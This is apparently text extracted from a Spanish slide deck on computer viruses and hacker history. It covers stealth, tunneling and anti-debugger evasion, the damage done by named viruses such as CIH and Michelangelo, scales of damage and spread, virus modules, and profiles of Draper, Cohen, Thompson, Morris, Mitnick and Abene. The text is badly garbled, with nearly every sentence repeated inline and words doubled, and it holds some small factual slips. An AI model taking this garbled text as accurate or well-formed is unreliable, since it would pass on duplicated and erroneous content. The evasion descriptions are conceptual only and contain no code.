Los programadores de virus usan distintas técnicas para Los programadores de virus usan distintas técnicas para procurar que su virus difícil de detectar por los usuario y los procurar que su virus difícil de detectar por los usuario y los propios antivirus estas técnicas son las siguientes:propios antivirus estas técnicas son las siguientes:

Técnicas Stealth: Técnicas Stealth: Son técnicas "furtivas" que utilizan para pasar Son técnicas "furtivas" que utilizan para pasar

desapercibidos al usuario y a los antivirus. Habitualmente desapercibidos al usuario y a los antivirus. Habitualmente los virus ocultan el tamaño real de los ficheros que han los virus ocultan el tamaño real de los ficheros que han contaminado, de forma que si hacemos un DIR la contaminado, de forma que si hacemos un DIR la información del tamaño de los archivos puede ser falsa. Los información del tamaño de los archivos puede ser falsa. Los virus de tabla de partición guardan una copia de la FAT virus de tabla de partición guardan una copia de la FAT original en otro lugar del disco que marcan como sectores original en otro lugar del disco que marcan como sectores defectuosos para mostrársela al usuario cuando haga por defectuosos para mostrársela al usuario cuando haga por ejemplo un FDISK. Incluso hay virus que detectan la ejemplo un FDISK. Incluso hay virus que detectan la ejecución de determinados antivirus y  descargan de la ejecución de determinados antivirus y  descargan de la memoria partes de su propio código "sospechoso" para memoria partes de su propio código "sospechoso" para cargarse de nuevo cuando estos han finalizado su búsqueda. cargarse de nuevo cuando estos han finalizado su búsqueda.

Page 32: LOS VIRUS

-TUNNELING:-TUNNELING:

Es una técnica usada por programadores de virus y antivirus Es una técnica usada por programadores de virus y antivirus para evitar todas las rutinas al servicio de una interrupción y para evitar todas las rutinas al servicio de una interrupción y tener así un control directo sobre esta. tener así un control directo sobre esta.

Requiere una programación compleja, hay que colocar el Requiere una programación compleja, hay que colocar el procesador en modo paso a paso. En este modo de procesador en modo paso a paso. En este modo de funcionamiento, tras ejecutarse cada instrucción se produce funcionamiento, tras ejecutarse cada instrucción se produce la interrupción 1. Se coloca una ISR (Interrupt Service la interrupción 1. Se coloca una ISR (Interrupt Service Routine) para dicha interrupción y se ejecutan instrucciones Routine) para dicha interrupción y se ejecutan instrucciones comprobando cada vez si se ha llegado a donde se quería comprobando cada vez si se ha llegado a donde se quería hasta hasta recorrer toda la cadena de ISRs que halla colocando el recorrer toda la cadena de ISRs que halla colocando el parche al final de la cadena. parche al final de la cadena.

Page 33: LOS VIRUS

-ANTIDEBUGGER:-ANTIDEBUGGER:

Un debugger es un programa que permite Recompilar Un debugger es un programa que permite Recompilar programas ejecutables y mostrar parte de su código en programas ejecutables y mostrar parte de su código en lenguaje original. Los virus usan técnicas para evitar ser lenguaje original. Los virus usan técnicas para evitar ser desensamblados y así impedir su análisis para la fabricación desensamblados y así impedir su análisis para la fabricación del antivirus correspondiente.  del antivirus correspondiente. 

Page 34: LOS VIRUS

2.7-LOS DAÑOS QUE CAUSAN 2.7-LOS DAÑOS QUE CAUSAN LOS VIRUS:LOS VIRUS: Los virus causas daños a distintos elementos del ordenador dichos Los virus causas daños a distintos elementos del ordenador dichos

elementos son el software y el hardware:elementos son el software y el hardware:

En software:En software: Modificar programas y datos (virus Black Box: Modificar programas y datos (virus Black Box: agrega un número de bytes a los programas infectados.) agrega un número de bytes a los programas infectados.)

Eliminar programas y datos (Melissa: Macrovirus de Word). Se envía Eliminar programas y datos (Melissa: Macrovirus de Word). Se envía a sí mismo por correo. Daña todos los archivos a sí mismo por correo. Daña todos los archivos

DOC; virus JERUSALEM: borra, los viernes 13, todos los programas DOC; virus JERUSALEM: borra, los viernes 13, todos los programas que el usuario trate de utilizar después de haberse infectado la que el usuario trate de utilizar después de haberse infectado la memoria residente. memoria residente.

Agotar el espacio libre del disco rígido. Agotar el espacio libre del disco rígido. Demorar el trabajo del sistema. Demorar el trabajo del sistema. Sustraer información confidencial (Mighty: gusano para Linux:, Sustraer información confidencial (Mighty: gusano para Linux:,

Troj/Backdoor.Netdex.A: trojano, W32/Daboom): gusano de Internet, Troj/Backdoor.Netdex.A: trojano, W32/Daboom): gusano de Internet, caballo de Troya tipo RAT. caballo de Troya tipo RAT.

Producir mensajes o efectos extraños en pantalla Producir mensajes o efectos extraños en pantalla (WinWord.Concept): Macrovirus que infecta la plantilla Normal.dot. (WinWord.Concept): Macrovirus que infecta la plantilla Normal.dot. Hace aparecer mensajes en la pantalla y el WORD funciona Hace aparecer mensajes en la pantalla y el WORD funciona incorrectamente. incorrectamente.

Emitir música o ruidos (virus FORM): el día 18 de cada mes cualquier Emitir música o ruidos (virus FORM): el día 18 de cada mes cualquier tecla que se presione hace sonar el beep. tecla que se presione hace sonar el beep.

Page 35: LOS VIRUS

-EN HARDWARE:-EN HARDWARE:

Borrar el BIOS (Chernobyl (W95.CIH): Intenta reescribir el Borrar el BIOS (Chernobyl (W95.CIH): Intenta reescribir el BIOS de la PC lo que obliga a cambiar la motherboard. BIOS de la PC lo que obliga a cambiar la motherboard.

Formatear el disco rígido (FormatC): Troyano que infecta el Formatear el disco rígido (FormatC): Troyano que infecta el Word, al abrir un archivo infectado formatea el disco rígido. Word, al abrir un archivo infectado formatea el disco rígido.

Borrar la FAT (tabla de partición de archivos), Chernobyl Borrar la FAT (tabla de partición de archivos), Chernobyl (W95.CIH): Borra el primer Mb del diso duro, donde se (W95.CIH): Borra el primer Mb del diso duro, donde se encuentra la FAT. Obliga a formatear el disco duro. Además encuentra la FAT. Obliga a formatear el disco duro. Además intenta reescribir el BIOS de la PC lo que obliga a cambiar la intenta reescribir el BIOS de la PC lo que obliga a cambiar la motherboard. Se activa el 26 de abril. Michelangelo: Virus motherboard. Se activa el 26 de abril. Michelangelo: Virus del sector de arranque. Se activa el 6 de marzo.del sector de arranque. Se activa el 6 de marzo.

Sobreescribe la FAT, deja el disco inutilizable. Sobreescribe la FAT, deja el disco inutilizable.

Alterar el MBR (Master Boot Record), Troj/Killboot.B. Trojano Alterar el MBR (Master Boot Record), Troj/Killboot.B. Trojano que borra el MBR llenándolo de ceros. que borra el MBR llenándolo de ceros.

Page 36: LOS VIRUS

2.8-GRADOS DE DAÑO DE LOS 2.8-GRADOS DE DAÑO DE LOS VIRUS:VIRUS:

Sin daños: Sin daños: En este caso el virus no realiza ninguna acción En este caso el virus no realiza ninguna acción tras la infección generalmente suelen ser virus que solo se tras la infección generalmente suelen ser virus que solo se dedican a propagarse e infectar otros ordenadores o dedican a propagarse e infectar otros ordenadores o elementos elementos

Daño mínima:Daño mínima: Solamente realizan acciones que son Solamente realizan acciones que son molestas para el usuario sin afectar a la integridad de la molestas para el usuario sin afectar a la integridad de la información ni otras áreas del equipo (suelen presentar información ni otras áreas del equipo (suelen presentar mensajes, animaciones etc)mensajes, animaciones etc)

Daño moderado/escaso:Daño moderado/escaso: En este caso pueden presentarse En este caso pueden presentarse modificaciones de archivos o perdidas moderadas de modificaciones de archivos o perdidas moderadas de información pero nunca serán totalmente destructivas .Las información pero nunca serán totalmente destructivas .Las posibles acciones del virus serian reparablesposibles acciones del virus serian reparables

Page 37: LOS VIRUS

-CONTINUACION:-CONTINUACION: Daño grave:Daño grave: Perdida de grandes cantidades de información y/o Perdida de grandes cantidades de información y/o

archivos aun asi parte de los datos podrían ser recuperados aunque archivos aun asi parte de los datos podrían ser recuperados aunque el proceso seria complicado el proceso seria complicado

Daño muy grave irreparable:Daño muy grave irreparable: En este caso podría perder toda la En este caso podría perder toda la información contenidas en las unidades de disco infectadas. Se información contenidas en las unidades de disco infectadas. Se podrían además perder la estructura de cada una de las unidades de podrían además perder la estructura de cada una de las unidades de disco ( por lo menos de la principal) mediante el formateo de estas disco ( por lo menos de la principal) mediante el formateo de estas los daños causados son difíciles de recuperar y en ocasiones los daños causados son difíciles de recuperar y en ocasiones irreparables pero tambien pueden afectar a otros sistemas como la irreparables pero tambien pueden afectar a otros sistemas como la BIOS, la RAM etcBIOS, la RAM etc

Daños imprevisibles: Son aquellos que generalmente causan los Daños imprevisibles: Son aquellos que generalmente causan los troyanostroyanos

Estos son programas que pueden estar siendo manejados de forma Estos son programas que pueden estar siendo manejados de forma remota desde otro ordenador este tipo de programas cada vez son remota desde otro ordenador este tipo de programas cada vez son mas complejos y cuentas con mas utilidades y funciones de ataquemas complejos y cuentas con mas utilidades y funciones de ataque

Page 38: LOS VIRUS

2.9-GRADOS DE PROPAGACION 2.9-GRADOS DE PROPAGACION DE UN VIRUS:DE UN VIRUS: La propagación de un virus se determina mediante el ratio La propagación de un virus se determina mediante el ratio

de infección, que mide el porcentaje de ordenadores de infección, que mide el porcentaje de ordenadores infectados en relación al total de equipos explorados. infectados en relación al total de equipos explorados.

Los valores que puede adoptar el grado de propagación de Los valores que puede adoptar el grado de propagación de un virus son los siguientes: un virus son los siguientes:

Epidemia:Epidemia: el porcentaje de ordenadores examinados e el porcentaje de ordenadores examinados e infectados con el virus es del 10% o superior. infectados con el virus es del 10% o superior.

    Propagación alta:Propagación alta: el porcentaje de ordenadores el porcentaje de ordenadores

examinados e infectados con el virus es superior al 7,5% e examinados e infectados con el virus es superior al 7,5% e inferior al 10%.  inferior al 10%.  

Propagación media:Propagación media: el porcentaje de ordenadores el porcentaje de ordenadores examinados e infectados con el virus es superior al 1,0% e examinados e infectados con el virus es superior al 1,0% e inferior al 7,5%.  inferior al 7,5%.  

Propagación baja:Propagación baja: el porcentaje de ordenadores el porcentaje de ordenadores examinados e infectados con el virus es inferior al 1,0%.  examinados e infectados con el virus es inferior al 1,0%.  

Page 39: LOS VIRUS

2.10-GRADOS DE 2.10-GRADOS DE PELIGROSIDAD DE UN VIRUS:PELIGROSIDAD DE UN VIRUS: Peligrosidad baja:Peligrosidad baja: amenaza pequeña, ya que el virus amenaza pequeña, ya que el virus

es muy dañino, está poco extendido.   es muy dañino, está poco extendido.  

Peligrosidad media:Peligrosidad media: el virus está relativamente el virus está relativamente extendido y su infección causa perjuicios ó bien está extendido y su infección causa perjuicios ó bien está poco extendido pero su infección puede causar daños poco extendido pero su infección puede causar daños importantes.  importantes. 

Peligrosidad alta:Peligrosidad alta: amenaza importante, ya que el amenaza importante, ya que el virus está muy extendido y su infección causa daños ó virus está muy extendido y su infección causa daños ó bien está relativamente extendido y además su bien está relativamente extendido y además su infección causa grandes perjuicios. infección causa grandes perjuicios. 

Peligrosidad muy alta:Peligrosidad muy alta: amenaza muy importante, ya amenaza muy importante, ya que está muy extendido y su infección causa grandes que está muy extendido y su infección causa grandes perjuicios. perjuicios.

Lógicamente, la peligrosidad de un virus puede variar, Lógicamente, la peligrosidad de un virus puede variar, siendo de peligrosidad baja en un momento y de muy siendo de peligrosidad baja en un momento y de muy alta peligrosidad en otro, dependiendo de lo extendido alta peligrosidad en otro, dependiendo de lo extendido que esté. que esté.

Page 40: LOS VIRUS

2.11-ESTRUCTURA DE UN 2.11-ESTRUCTURA DE UN VIRUS:VIRUS:

En la estructura básica de un virus informatico En la estructura básica de un virus informatico podemos distinguir tres modulos:podemos distinguir tres modulos:

Modulo de reproducciónModulo de reproducción

Modulo de ataqueModulo de ataque

Modulo de defensaModulo de defensa

Page 41: LOS VIRUS

-MODULO DE -MODULO DE REPRODUCCION:REPRODUCCION:

Es el encargado de manejar las rutinas de parasitacion con Es el encargado de manejar las rutinas de parasitacion con el fin de que el virus informatico reproduzca. De esta el fin de que el virus informatico reproduzca. De esta manera puede tomar el control del sistema e infectar otras manera puede tomar el control del sistema e infectar otras entidades que posibiliten que el virus se traslade de un entidades que posibiliten que el virus se traslade de un ordenador a otro a través de alguna de ellas ordenador a otro a través de alguna de ellas

Page 42: LOS VIRUS

-MODULO DE ATAQUE:-MODULO DE ATAQUE:

Este modulo es optativo – un virus puede tenerlo o no- es el Este modulo es optativo – un virus puede tenerlo o no- es el que maneja las rutinas de daño adicional del virus las que que maneja las rutinas de daño adicional del virus las que son activadas cuando el sistema cumple algun tipo de son activadas cuando el sistema cumple algun tipo de condicion condicion

Page 43: LOS VIRUS

-MODULO DE DEFENSA:-MODULO DE DEFENSA:

Este modulo tambien es optativo tiene la obvia misión Este modulo tambien es optativo tiene la obvia misión de defender al virus informatico sus rutinas apuntan a de defender al virus informatico sus rutinas apuntan a evitar acciones que faciliten o provoquen la detección evitar acciones que faciliten o provoquen la detección del virus cada vez son mas sofisticadas las técnicas de del virus cada vez son mas sofisticadas las técnicas de defensa de los virus informaticosdefensa de los virus informaticos

Page 44: LOS VIRUS

3-HISTORIA DE LOS 3-HISTORIA DE LOS HACKERS:HACKERS:

Page 45: LOS VIRUS

3.1-DEFINICION:3.1-DEFINICION:

Hacker, originalmente, término utilizado para referirse a un Hacker, originalmente, término utilizado para referirse a un aficionado a los ordenadores o computadoras, totalmente cautivado aficionado a los ordenadores o computadoras, totalmente cautivado por la programación y la tecnología informática.por la programación y la tecnología informática.

En la década de 1980, con la llegada de las computadoras En la década de 1980, con la llegada de las computadoras personales, y posteriormente con la posibilidad de conexión a los personales, y posteriormente con la posibilidad de conexión a los grandes sistemas de ordenadores a través de Internet, este término grandes sistemas de ordenadores a través de Internet, este término adquirió una connotación peyorativa y comenzó a usarse para adquirió una connotación peyorativa y comenzó a usarse para denominar a quien se conecta a una red para invadir en secreto denominar a quien se conecta a una red para invadir en secreto computadoras, y consultar, alterar o eliminar los programas o los computadoras, y consultar, alterar o eliminar los programas o los datos almacenados en las mismas, aunque a eso es a lo que dedican datos almacenados en las mismas, aunque a eso es a lo que dedican su atención los denominados crackers. su atención los denominados crackers.

También se utiliza para referirse a alguien que, además de También se utiliza para referirse a alguien que, además de programar, disfruta desensamblando sistemas operativos y programar, disfruta desensamblando sistemas operativos y programas para entender su lógica de funcionamiento, para lo que programas para entender su lógica de funcionamiento, para lo que utiliza programas que desensamblan el código y realizan operaciones utiliza programas que desensamblan el código y realizan operaciones de ingeniería inversa. de ingeniería inversa.

Page 46: LOS VIRUS

3.2-¿COMO ES UN HACKER?:3.2-¿COMO ES UN HACKER?:

Un hacer se considera miembro de una elite de elegidos. Un hacer se considera miembro de una elite de elegidos. Para pertenecer a ella debe demostrar que se lo merece. Por Para pertenecer a ella debe demostrar que se lo merece. Por lo general los hackers no tienen problemas en aceptar lo general los hackers no tienen problemas en aceptar nuevos miembros en su elite, pero un hacKer se puede nuevos miembros en su elite, pero un hacKer se puede considerar tal solamente cuando otros lo llaman hackers. considerar tal solamente cuando otros lo llaman hackers. Otra característica de los hackers, que los hace peligrosos Otra característica de los hackers, que los hace peligrosos para si mismos, es su tendencia a fanfarronear con sus para si mismos, es su tendencia a fanfarronear con sus logroslogros..

Page 47: LOS VIRUS

3.3-COMO DIFERENCIAR ENTRE 3.3-COMO DIFERENCIAR ENTRE HACKER Y CRACKER:HACKER Y CRACKER:

El hacker:El hacker: EsEs alguien que se apasiona por las computadoras alguien que se apasiona por las computadoras y se dedica a ellas más allá de los límites. Los hackers tienen y se dedica a ellas más allá de los límites. Los hackers tienen "un saludable sentido de curiosidad: prueban todas las "un saludable sentido de curiosidad: prueban todas las cerraduras de las puertas para averiguar si están cerradas. No cerraduras de las puertas para averiguar si están cerradas. No sueltan un sistema que están investigando hasta que los sueltan un sistema que están investigando hasta que los problemas que se le presenten queden resueltos".problemas que se le presenten queden resueltos".

El cracker:El cracker: EEs aquella persona que haciendo gala de grandes s aquella persona que haciendo gala de grandes conocimientos sobre computación y con un obcecado conocimientos sobre computación y con un obcecado propósito de luchar en contra de lo que le está prohibido, propósito de luchar en contra de lo que le está prohibido, empieza a investigar la forma de bloquear protecciones hasta empieza a investigar la forma de bloquear protecciones hasta lograr su objetivo. Los crackers modernos usan programas lograr su objetivo. Los crackers modernos usan programas propios o muchos de los que se distribuyen gratuitamente en propios o muchos de los que se distribuyen gratuitamente en cientos de páginas web en Internet, tales como rutinascientos de páginas web en Internet, tales como rutinas

Page 48: LOS VIRUS

-JHON DRAPER: CAPITAN -JHON DRAPER: CAPITAN CRUNCHCRUNCH Nuestra historia comienza a principios de los años 70, de la Nuestra historia comienza a principios de los años 70, de la

mano de un joven de 27 años llamado John Drapea. mano de un joven de 27 años llamado John Drapea. Por aquel entonces la empresa Quaker Oaks comercializaba Por aquel entonces la empresa Quaker Oaks comercializaba

(y aún comercializa) en los EEUU unos cereales llamados (y aún comercializa) en los EEUU unos cereales llamados “Cap’n Crunch”, cuya mascota era un simpático capitán de “Cap’n Crunch”, cuya mascota era un simpático capitán de barco. Como muchas otras marcas, solían incluir en las cajas barco. Como muchas otras marcas, solían incluir en las cajas un regalo promocional para incrementar las ventas. Fue un regalo promocional para incrementar las ventas. Fue gracias a un amigo ciego como John Draper se enteró de gracias a un amigo ciego como John Draper se enteró de que, taponando con pegamento uno de los agujeros del que, taponando con pegamento uno de los agujeros del silbato, éste producía un tono puro con una frecuencia de silbato, éste producía un tono puro con una frecuencia de 2600 Hz, que era casualmente la frecuencia usada en las 2600 Hz, que era casualmente la frecuencia usada en las conexiones telefónicas de larga distancia para indicar que la conexiones telefónicas de larga distancia para indicar que la llamada había terminado. De esta forma, al emitir el tono de llamada había terminado. De esta forma, al emitir el tono de 2600 Hz, la compañía telefónica dejaba de tarificar la 2600 Hz, la compañía telefónica dejaba de tarificar la llamada, aunque la llamada continuaba hasta que una de las llamada, aunque la llamada continuaba hasta que una de las partes colgara el auricular. partes colgara el auricular.

Una vez emitido el tono de 2600 Hz, uno de los extremos de Una vez emitido el tono de 2600 Hz, uno de los extremos de la línea se desconectaba y el lado conectado entrar en modo la línea se desconectaba y el lado conectado entrar en modo de operador, listo para “escuchar” los tonos especiales que de operador, listo para “escuchar” los tonos especiales que determinaban la llamada. Esto, literalmente, abría los determinaban la llamada. Esto, literalmente, abría los circuitos de la compañía a cualquiera que supiera como circuitos de la compañía a cualquiera que supiera como utilizarlos. El hack era posible debido a la política de recorte utilizarlos. El hack era posible debido a la política de recorte de precios de las líneas ATT de larga distancia, en las que la de precios de las líneas ATT de larga distancia, en las que la voz y la señal usaban el mismo canal. voz y la señal usaban el mismo canal.

Page 49: LOS VIRUS

CONTINUACIONCONTINUACION

Experimentando con el silbato, Draper, al que se le empezaba Experimentando con el silbato, Draper, al que se le empezaba a conocer ya con el apódo de “Cap’n Crunch”, construyó la a conocer ya con el apódo de “Cap’n Crunch”, construyó la famosa “caja azul”, un dispositivo electrónico capaz de famosa “caja azul”, un dispositivo electrónico capaz de reproducir el resto de tonos usados por la compañía reproducir el resto de tonos usados por la compañía telefónica, mediante los cuales el terminal reconocía, por telefónica, mediante los cuales el terminal reconocía, por ejemplo, que número se estaba marcando, ya que cada tecla ejemplo, que número se estaba marcando, ya que cada tecla tenía un tono diferente. Todavía hoy en día podéis comprobar tenía un tono diferente. Todavía hoy en día podéis comprobar esto en vuestra propia casa, en cualquier teléfono de teclas. esto en vuestra propia casa, en cualquier teléfono de teclas. Pulsadlas y observaréis como cada número del teclado Pulsadlas y observaréis como cada número del teclado produce un sonido diferente al presionarlo. produce un sonido diferente al presionarlo.

De esta forma, gracias a los sonidos reproducidos por la “caja De esta forma, gracias a los sonidos reproducidos por la “caja azul” John Draper consiguió uno de los primeros hackeos de la azul” John Draper consiguió uno de los primeros hackeos de la historia: realizar llamadas teléfonicas gratuitas a larga historia: realizar llamadas teléfonicas gratuitas a larga distancia. Primero emitía el tono de 2600 Hz para entrar en distancia. Primero emitía el tono de 2600 Hz para entrar en modo de operador y, a continuación, emitía los tonos modo de operador y, a continuación, emitía los tonos correspondientes a las cifras del número que quería marcar.correspondientes a las cifras del número que quería marcar.

El invento dió la vuelta al mundo. Gracias a él, miles de El invento dió la vuelta al mundo. Gracias a él, miles de usuarios estuvieron realizando llamadas telefónicas de larga usuarios estuvieron realizando llamadas telefónicas de larga distancia y conectándose gratuitamente a BBS de todo el distancia y conectándose gratuitamente a BBS de todo el planeta.planeta.

Page 50: LOS VIRUS

CONTINUACIONCONTINUACION El mismísimo Steve Wozniak, cofundador de Apple junto a El mismísimo Steve Wozniak, cofundador de Apple junto a

Steve Jobs, había conocido a Draper en la Universidad de Steve Jobs, había conocido a Draper en la Universidad de Berkeley en el invierno de 1971. Draper le explicó los Berkeley en el invierno de 1971. Draper le explicó los fundamentos de la “caja azul”, gracias a lo cual se sacó fundamentos de la “caja azul”, gracias a lo cual se sacó unos cuantos dólares en la Universidad construyendo y unos cuantos dólares en la Universidad construyendo y vendiendo estos aparatos. Este dinero permitió a Woz y vendiendo estos aparatos. Este dinero permitió a Woz y Steve financiar el prototipo del primer ordenador Apple: el Steve financiar el prototipo del primer ordenador Apple: el Apple I. Apple I.

El propio Draper fue durante un tiempo empleado de Apple, El propio Draper fue durante un tiempo empleado de Apple, creando un módem para el Apple II, que nunca llegó a creando un módem para el Apple II, que nunca llegó a comercializarse, entre otras razones porque Draper fue comercializarse, entre otras razones porque Draper fue arrestado nuevamente en 1977. En la cárcel, Draper arrestado nuevamente en 1977. En la cárcel, Draper programó EasyWriter, que fue el primer procesador de texto programó EasyWriter, que fue el primer procesador de texto del ordenador Apple II. Esta serie de acontecimientos me del ordenador Apple II. Esta serie de acontecimientos me plantea una pregunta, cuando menos, interesante, que plantea una pregunta, cuando menos, interesante, que muestra como lo que parecen una serie de coincidencias muestra como lo que parecen una serie de coincidencias fortuitas influyen decisivamente en el devenir de la historia: fortuitas influyen decisivamente en el devenir de la historia: ¿Existiría el iMac si a la empresa Quaker Oaks no se le ¿Existiría el iMac si a la empresa Quaker Oaks no se le hubiera ocurrido regalar un silbato en sus cereales?hubiera ocurrido regalar un silbato en sus cereales?

Page 51: LOS VIRUS

CONTINUACIONCONTINUACION Cuando la compañía telefónica se dió cuenta de Cuando la compañía telefónica se dió cuenta de

esta vulnerabilidad de los teléfonos antiguos, esta vulnerabilidad de los teléfonos antiguos, intentó corregirla usando circuitos separados intentó corregirla usando circuitos separados para la voz y las señales, de modo que, aunque para la voz y las señales, de modo que, aunque se introdujeran los tonos correctos por el se introdujeran los tonos correctos por el auricular; al ir estos por un canal separado no auricular; al ir estos por un canal separado no pudieran interferir en el sistema de conexión de pudieran interferir en el sistema de conexión de llamadas. Posteriormente, la sustitución de la llamadas. Posteriormente, la sustitución de la tecnología analógica por la digital eliminó de tecnología analógica por la digital eliminó de raíz la posibilidad de interferir en el sistema de raíz la posibilidad de interferir en el sistema de conexión. Sin embargo, el famoso silbato de conexión. Sin embargo, el famoso silbato de Cap’n Crunch sigue teniendo un gran valor como Cap’n Crunch sigue teniendo un gran valor como objeto de coleccionista.objeto de coleccionista.

La historia del Cap’n Crunch dió origen, además, La historia del Cap’n Crunch dió origen, además, al nombre a la revista de hackers más famosa al nombre a la revista de hackers más famosa de la historia: “The 2600 Magazine”, que de la historia: “The 2600 Magazine”, que todavía sigue en activo.todavía sigue en activo.

Page 52: LOS VIRUS
Page 53: LOS VIRUS

-FRED COHEN:-FRED COHEN:

En 1984 al sustentar su tesis para un doctorado en En 1984 al sustentar su tesis para un doctorado en Ingeniería Eléctrica, en la Universidad del Sur de California, Ingeniería Eléctrica, en la Universidad del Sur de California, demostró cómo se podían crear virus, motivo por el cual es demostró cómo se podían crear virus, motivo por el cual es considerado como el primer autor de virus "auto-declarado". considerado como el primer autor de virus "auto-declarado". Clasificó a los emergentes virus de computadoras en tres Clasificó a los emergentes virus de computadoras en tres categorías: caballos de troya, gusanos y viruscategorías: caballos de troya, gusanos y virus

Page 54: LOS VIRUS

-KENETH THOMPSON:-KENETH THOMPSON:

Desarrolló el Lenguaje B, predecesor e inspirador del Desarrolló el Lenguaje B, predecesor e inspirador del Lenguaje C. Asimismo, Thompson re-escribió el Kernel de Lenguaje C. Asimismo, Thompson re-escribió el Kernel de UNIX para perfeccionarlo. Junto a Dennis Ritchie UNIX para perfeccionarlo. Junto a Dennis Ritchie desarrollaron desde 1969 a 1971 el famoso sistema desarrollaron desde 1969 a 1971 el famoso sistema operativo UNIX.operativo UNIX.En 1984, emulando al Dr. Fred Cohen y siendo aún un En 1984, emulando al Dr. Fred Cohen y siendo aún un estudiante, Keneth Thompson demostró la forma de estudiante, Keneth Thompson demostró la forma de desarrollar virus de computadoras, frente a una concurrida desarrollar virus de computadoras, frente a una concurrida audiencia en la universidad de Berkeley. audiencia en la universidad de Berkeley.

Page 55: LOS VIRUS

-ROBERT TAPPAN MORRIS: -ROBERT TAPPAN MORRIS:

Robert Tappan Morris hijo de Robert Thomas Morris uno de Robert Tappan Morris hijo de Robert Thomas Morris uno de los precursores de los virus y recién graduado en Computer los precursores de los virus y recién graduado en Computer Science en la Universidad de Cornell, en 1988 difundió un Science en la Universidad de Cornell, en 1988 difundió un virus a través de ArpaNet, (precursora de Internet) logrando virus a través de ArpaNet, (precursora de Internet) logrando infectar 6,000 servidores conectados a la red. La infectar 6,000 servidores conectados a la red. La propagación la realizó desde uno de los terminales del MIT propagación la realizó desde uno de los terminales del MIT (Instituto Tecnológico de Massachussets). ArpaNet empleaba (Instituto Tecnológico de Massachussets). ArpaNet empleaba el UNIX, como sistema operativo. Robert Tappan Morris al el UNIX, como sistema operativo. Robert Tappan Morris al ser descubierto, fue enjuiciado y condenado en la corte de ser descubierto, fue enjuiciado y condenado en la corte de Syracuse, estado de Nueva York, a 4 años de prisión y el Syracuse, estado de Nueva York, a 4 años de prisión y el pago de US $ 10,000 de multa, pena que fue conmutada a pago de US $ 10,000 de multa, pena que fue conmutada a libertad bajo palabra y condenado a cumplir 400 horas de libertad bajo palabra y condenado a cumplir 400 horas de trabajo comunitario. trabajo comunitario.

Page 56: LOS VIRUS

-KEVIN DAVID MITNICK:-KEVIN DAVID MITNICK:

Kevin David MitnickKevin David Mitnick es el más famoso hackers de los es el más famoso hackers de los últimos tiempos. Nacido el 6 de Agosto de 1963 en Van últimos tiempos. Nacido el 6 de Agosto de 1963 en Van Nuts, California, desde muy niño Nuts, California, desde muy niño sintió curiosidad por los sistemas de comunicación sintió curiosidad por los sistemas de comunicación electrónica y fue cultivando un obsesivo deseo por electrónica y fue cultivando un obsesivo deseo por investigar cosas y lograr objetivos aparentemente investigar cosas y lograr objetivos aparentemente imposibles, hasta llegar a poseer una genial habilidad para imposibles, hasta llegar a poseer una genial habilidad para ingresar a servidores sin autorización, robar información, ingresar a servidores sin autorización, robar información, interceptar teléfonos, crear virus, etc. interceptar teléfonos, crear virus, etc.

Page 57: LOS VIRUS

-CONTINUACION:-CONTINUACION:

Cuando en 1992 el gobierno acusó a Kevin de haber Cuando en 1992 el gobierno acusó a Kevin de haber substraído información del FBI, relacionada a la substraído información del FBI, relacionada a la investigación de Ferdinand Marcos y de haber penetrado en investigación de Ferdinand Marcos y de haber penetrado en computadoras militares, el se convirtió en un símbolo entre computadoras militares, el se convirtió en un símbolo entre la comunidad internacional de hackers, después de que el la comunidad internacional de hackers, después de que el FBI lo investigara y persiguiera infructuosamente durante FBI lo investigara y persiguiera infructuosamente durante tres años, y cuya captura se produjo en 1995, cuando los tres años, y cuya captura se produjo en 1995, cuando los investigadores rastrearon sus huellas hasta llegar a un investigadores rastrearon sus huellas hasta llegar a un departamento en Raleigh, en Carolina del Norte. departamento en Raleigh, en Carolina del Norte.

Page 58: LOS VIRUS

-CONTINUACION:-CONTINUACION:

Mitnick fue arrestado por el FBI en Raleigh, North Carolina, Mitnick fue arrestado por el FBI en Raleigh, North Carolina, el 15 de Febrero de 1995. Mitnick, quién fue liberado en el 15 de Febrero de 1995. Mitnick, quién fue liberado en Enero del 2000, después de permanecer casi 5 años en un Enero del 2000, después de permanecer casi 5 años en un prisión federal, le costó al estado norteamericano y a prisión federal, le costó al estado norteamericano y a empresas privadas, millones de dólares al ser objeto de empresas privadas, millones de dólares al ser objeto de hurto de su software, información y alteración de los datos hurto de su software, información y alteración de los datos de las mismas. Entre los agraviados se incluyen de las mismas. Entre los agraviados se incluyen corporaciones tales como Motorola, Novell, Nokia y Sun corporaciones tales como Motorola, Novell, Nokia y Sun Microsystems, el FBI, el Pentágono y la Universidad de Microsystems, el FBI, el Pentágono y la Universidad de Southern California. Southern California.

Page 59: LOS VIRUS

-MARK ABENE:-MARK ABENE:

Más conocidoMás conocido como Phiber Optik, como Phiber Optik, con tan solo 17 años se con tan solo 17 años se convirtió en un genio de la computación y de la tecnología convirtió en un genio de la computación y de la tecnología telefónica. Lastelefónica. Lasprimeras computadoras usadas por Abene fueron una Apple primeras computadoras usadas por Abene fueron una Apple II, la Timex Sinclair y una Commodore 64. Aunque el primer II, la Timex Sinclair y una Commodore 64. Aunque el primer equipo de Mark fue una Radio Shack TSR 80, también tenía equipo de Mark fue una Radio Shack TSR 80, también tenía un receptor telefónico tantas veces usado, que tenía una un receptor telefónico tantas veces usado, que tenía una cinta plástica enrrollada para sostener sus partes internas, cinta plástica enrrollada para sostener sus partes internas, desgastadas por el excesivo uso. Mark Abene era un experto desgastadas por el excesivo uso. Mark Abene era un experto en patrones de discado en receptores telefónicos. Lideró en en patrones de discado en receptores telefónicos. Lideró en New York, al grupo de hackers denominado "Master of New York, al grupo de hackers denominado "Master of Deception", MOD (Maestros de la Decepción). Deception", MOD (Maestros de la Decepción).

Page 60: LOS VIRUS

-CONTINUACION:-CONTINUACION:

